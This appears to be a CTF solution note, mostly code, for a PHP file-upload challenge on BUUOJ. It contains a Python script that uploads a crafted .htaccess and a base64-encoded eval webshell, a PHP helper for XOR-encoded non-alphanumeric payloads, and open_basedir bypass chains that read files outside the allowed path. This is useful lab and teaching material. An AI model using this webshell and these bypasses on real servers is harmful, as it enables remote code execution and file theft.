知识点:
AddType application/x-httpd-php .ahhh // 在 .htaccess 中添加该指令，使 .ahhh 后缀的文件被当作 php 脚本解析
GIF89a文件头欺骗
GIF89a12：追加 "12" 是为了把文件头补足到 8 个字节（4 的倍数），满足 base64 解码按 4 字符分组的规则
绕过open_basedir
无数字字母webshell
python上传脚本
import requests
import base64
# Upload chain for the challenge: first a .htaccess that changes how the
# upload directory is served, then the shell itself.
# NOTE(review): the whole chain depends on the upload directory honouring
# .htaccess overrides and on both files landing in the same web-served
# directory (auto_append_file points at ./shell.ahhh) — confirm against the
# challenge source.
#
# NOTE(review): the two "#define" lines look like an XBM-style image header,
# presumably so the file passes an image check (the notes above list header
# spoofing as the technique) — confirm. AddType makes ".ahhh" files parse as
# PHP; auto_append_file pulls shell.ahhh through a base64-decode filter, so
# the shell can be uploaded base64-encoded.
htaccess: bytes = b"""
#define width 1337
#define height 1337
AddType application/x-httpd-php .ahhh
php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"
"""
# "GIF89a12" is exactly 8 bytes: the spoofed GIF header plus "12" padding so
# the base64-decode filter stays on a 4-character boundary and the remainder
# decodes to the PHP payload (see the GIF89a12 note above).
shell: bytes = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
# Challenge instance URL. The query string carries the call encoded with the
# non-alphanumeric (XOR) technique described in the notes; presumably it is
# evaluated by the appended shell once both files are in place.
url: str = "http://1c512d61-43b5-41ae-9f74-4228d9af8caf.node4.buuoj.cn:81/?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"
# Step 1: upload the .htaccess, declared as image/jpeg in the multipart body.
files = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)
# Step 2: upload the encoded shell under the ".ahhh" extension registered above.
files = {'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)
异或脚本:
// Print, for each byte of $string, a pair of bytes from $a whose XOR equals
// it, as the URL-encoded form "%xx^%yy" — helper for the non-alphanumeric
// payload technique noted above. Output is HTML (<br/> separators).
// Returns 0 once $index reaches strlen($string); returns nothing (null)
// if the loops finish first.
function finds($string)
{
// Counts matches printed so far (see NOTE below on why this is fragile).
$index = 0;
// Candidate byte values: a handful of ASCII symbols, then 128..255.
$a = [33, 35, 36, 37, 40, 41, 42, 43, 45, 47, 58, 59, 60, 62, 63, 64, 92, 93, 94, 123, 125, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255];
// Both loops start at index 27 ($a[27] == 134), so $a[0..26] — the ASCII
// symbols and 128..133 — are never used. Presumably intentional; undocumented.
for ($i = 27; $i < count($a); $i++) {
for ($j = 27; $j < count($a); $j++) {
$x = $a[$i] ^ $a[$j];
// Scan the whole string for every pair, so output is in pair order, not
// string order — the caller has to reassemble the result.
for ($k = 0; $k < strlen($string); $k++) {
if (ord($string[$k]) == $x) {
echo $string[$k] ;
echo '<br/>';
echo '%' . dechex($a[$i]) . '^%' . dechex($a[$j]) ;
echo '<br/>';
$index++;
// NOTE(review): $index counts matches, not distinct positions. A later
// pair that XORs to an already-found character prints it again and bumps
// $index, so for strings with repeated characters this can return before
// every character has a pair.
if ($index == strlen($string)) {
return 0;
}
}
}
}
}
}
// Example run: emit XOR pairs for each character of "phpinfo".
finds("phpinfo");
bypass open_basedir
// Three variants of the open_basedir bypass used in the challenge; all share
// the same prefix:
//   chdir('img')                  step into a subdirectory inside the allowed path
//   ini_set('open_basedir','..')  replace the restriction with a *relative* path
//   chdir('..') x4                walk up the tree from that directory
//   ini_set('open_basedir','/')   widen the restriction to the filesystem root
// NOTE(review): the chain presumably works because the relative ".." value is
// re-evaluated against the new cwd after each chdir — confirm for the target
// PHP version. It also requires ini_set() to be callable from the script; an
// open_basedir fixed by the administrator (php_admin_value) or ini_set listed
// in disable_functions would stop it — confirm against the deployment.
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');
// Variant 2: same chain, then list the root directory.
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
// Variant 3: same chain, then read the challenge flag file found above.
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));